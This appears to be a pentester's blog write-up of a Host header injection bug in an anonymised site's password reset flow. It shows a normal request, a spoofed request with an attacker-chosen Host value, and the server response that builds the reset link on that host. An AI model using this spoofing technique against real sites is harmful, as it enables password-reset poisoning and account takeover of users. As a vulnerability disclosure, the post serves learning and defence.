Let me introduce one of my old finding today before you all.This particular bug was discovered in one of the private site for which i worked.
Before discussing about the vulnerability let us discuss about some background necessary for the attack.
Before discussing about the vulnerability let us discuss about some background necessary for the attack.
Very often multiple websites are hosted on the same IP
address. This is where the Host Header comes in. This header specifies which
website should process the HTTP request. The web server uses the value of this
header to dispatch the request to the specified website. Each website hosted on
the same IP address is called a virtual host.But what happens if we specify an invalid Host Header? If
Apache receives an unrecognized Host Header, it passes it to the first virtual host
defined in httpd.conf. Therefore, it's possible to send requests with arbitrary
Host Headers to the first virtual host.
so the application i penetested let's say (abc.com) was affected with similar kind of vulnerabilty,that why as attacker it was possible for me to send users of siites with fake password reset links ,but links controlled by attacker.
when a user of site goes for password reset procedure the site present this page to the users screenshot below
Password reset procedure goes like this.
GET /?743&user_email=victimemail@gmail.com&flag=2
HTTP/1.1
Host:
www.abc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: abc.com
Cookie: redacted
Connection: keep-alive
You could see the highlighted Host header value (abc.com which is a valid request from the site )
let us spoof our header(with same with google(take for example attacker controlled domain) and process the request:-
GET /?743&user_email=victimemail@gmail.com&flag=2
HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101
Firefox/36.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: abc.com
Cookie:redacted
Connection: keep-alive
Now
see the response for spoofed request
HTTP/1.1 302 Found
Date:xxxxx
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: uclid=0; path=/; domain=.google.com
Location: http://google.com/?743&user_email=victimemail@gmail.com&flag=6&user_type=0
Vary: Accept-Encoding
Content-Length: 37317
Keep-Alive: timeout=2, max=400
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
and now see the screenshot of victim email ,which shows the password reset link with domain controlled by attacker
0 comments:
Post a Comment